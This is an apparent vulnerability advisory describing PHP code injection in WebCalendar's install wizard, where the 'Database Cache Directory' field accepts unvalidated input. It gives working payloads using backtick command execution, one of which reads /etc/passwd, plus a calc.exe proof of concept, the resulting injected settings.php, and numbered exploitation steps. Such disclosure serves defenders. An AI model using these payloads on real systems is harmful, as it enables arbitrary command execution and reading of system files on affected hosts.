  
  
#######################################################
  
Vulnerability Type:
======================
PHP Code Injection
  
  
  
CVE Reference:
==============
N/A
  
  
  
Vulnerability Details:
=====================
  
Since WebCalendars install script is not removed after installation as
there is no "automatic" removal of it, low privileged users can inject
arbitrary
PHP code for the "Database Cache" directory value as no input validation
exists for this when a user installs the application using the WebCalendar
walk
thru wizard.
  
If WebCalendars installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain
code execution on the target system. The only item that is required is the
user must have privileges to authenticate to the MySQL Database and to run
the
install script. So, users who have install wizard access for the
WebCalendar application will now have ability to launch arbitrary system
commands on the
affected host.
  
One problem we must overcome is WebCalendar filters quotes " so we cannot
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat
this
obstacle using the all to forgotten backtick `CMD` operator!.
  
e.g.
  
*/?><?php echo `/bin/cat /etc/passwd`; ?>
  
This results in "settings.php" being injected like...
  
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
  
  
  
Exploitation steps(s):
=====================
  
1) Login to the WebCalendar Installation Wizard.
  
2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
  
3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).
  
*/?><?php exec(`calc.exe`); ?>
  
5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button
  
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
  
If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.
  
  
Disclosure Timeline:
===============================
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure
  
  
  
  
Exploitation Technique:
=======================
Remote
  
  
  
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
by Facebook Comment
Read More »